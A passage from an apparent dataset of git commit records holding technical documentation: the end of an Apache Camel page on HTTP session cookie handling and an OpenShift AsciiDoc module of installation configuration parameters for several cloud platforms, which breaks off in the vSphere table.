invocation\nwill get a new session. For the second route all invocations will share\na session. For the third route the first and the second invocation\nwithin the route share a session, but different (even parallel)\ninvocations of the route will not share a session.\n\n[source,xml]\n--------------------------------------------------------------------------------------------------------\n <cxf:rsClient id=\"rsClientProxy\" address=\"http:\/\/127.0.0.1:8080\/CxfRsProducerSessionTest\/\"\n serviceClass=\"org.apache.camel.component.cxf.jaxrs.testbean.EchoService\"\n loggingFeatureEnabled=\"true\" \/>\n\n <camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:\/\/proxy\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyinstance\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyexchange\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <\/route>\n <\/camelContext>\n\n <bean id=\"instanceCookieHandler\" class=\"org.apache.camel.http.common.cookie.InstanceCookieHandler\"\/>\n <bean id=\"exchangeCookieHandler\" class=\"org.apache.camel.http.common.cookie.ExchangeCookieHandler\"\/> \n--------------------------------------------------------------------------------------------------------\n\n[[HTTP-SessionHandling-ComponentDevelopers]]\n== Component Developers\n\nIf you want to develop a HTTP based component that is supposed to\nparticipate in a session you have to add the following parts to your\ncode:\n\n1. Include a build reference to camel-http-common (if it is not already\nthere)\n2. Add a cookieHandler parameter to the endpoint class (together with\ngetter and setter)\n3. Before your code does the HTTP call, if a cookie handler is set on\nthe endpoint perform a `cookieHandler.loadCookies(exchange, uri)` call.\nIt will return a `Map<String, List<String>>` containing the headers that\nneed to be sent to the server. The details how you need to send these\nheaders to the server depend on the underlying HTTP API you are using.\n4. After your code does receive the HTTP response if a cookie handler\nis set on the endpoint perform a\n`cookieHandler.storeCookies(exchange, uri, m)` call. `m` is a\n`Map<String, List<String>>` containing the HTTP headers returned from\nthe server.\n\n[[HTTP-SessionHandling-MoreInfo]]\n== More Info\n\nSome APIs provide more direct support for cookie handling. In this case\nit might be easier to get the underlying `java.net.CookieStore` with a\n`cookeManager.getCookieStore(exchange)` call and handle the cookies\nusing the cookie interface provided by the underlying library.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"569d409a2725b60ea7f474126d60a5d9310d5406","subject":"Document OSP PV limit workaround","message":"Document OSP PV limit workaround\n\nCommit implements https:\/\/issues.redhat.com\/browse\/OSDOCS-1278\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-configuration-parameters.adoc","new_file":"modules\/installation-configuration-parameters.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\n\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heteregeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\n\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n|`false` or `true`\n\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the pod network provider in the cluster.\n|Object\n\n|`networking.clusterNetwork`\n|The IP address pools for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`.\n|Array of objects\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. The IP block address pool.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.clusterNetwork.hostPrefix`\n|Required if you use `networking.clusterNetwork`. The prefix size to allocate to each node from the CIDR. For example, 24 would allocate 2^8=256 addresses to each node.\n|Integer\n\n|`networking.machineNetwork`\n|The IP address pools for machines.\n|Array of objects\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. The IP block address pool. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.networkType`\n|The type of network to install. The default is `OpenShiftSDN`.\n|String\n\n|`networking.serviceNetwork`\n|The IP address pools for services. The default is 172.30.0.0\/16.\n|Array of IP networks. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n key1...\n key2...\n key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.lbFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`machines.platform.azure.type`\n|The Azure VM instance type.\n|VMs that use Windows or Linux as the operating system. See the\nlink:https:\/\/docs.microsoft.com\/en-us\/azure-stack\/operator\/azure-stack-supported-os?view=azs-1908[Guest operating systems supported on Azure Stack]\nin the Azure documentation.\n\n|`machines.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB, for example `512`. The\nminimum supported disk size is `120`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The 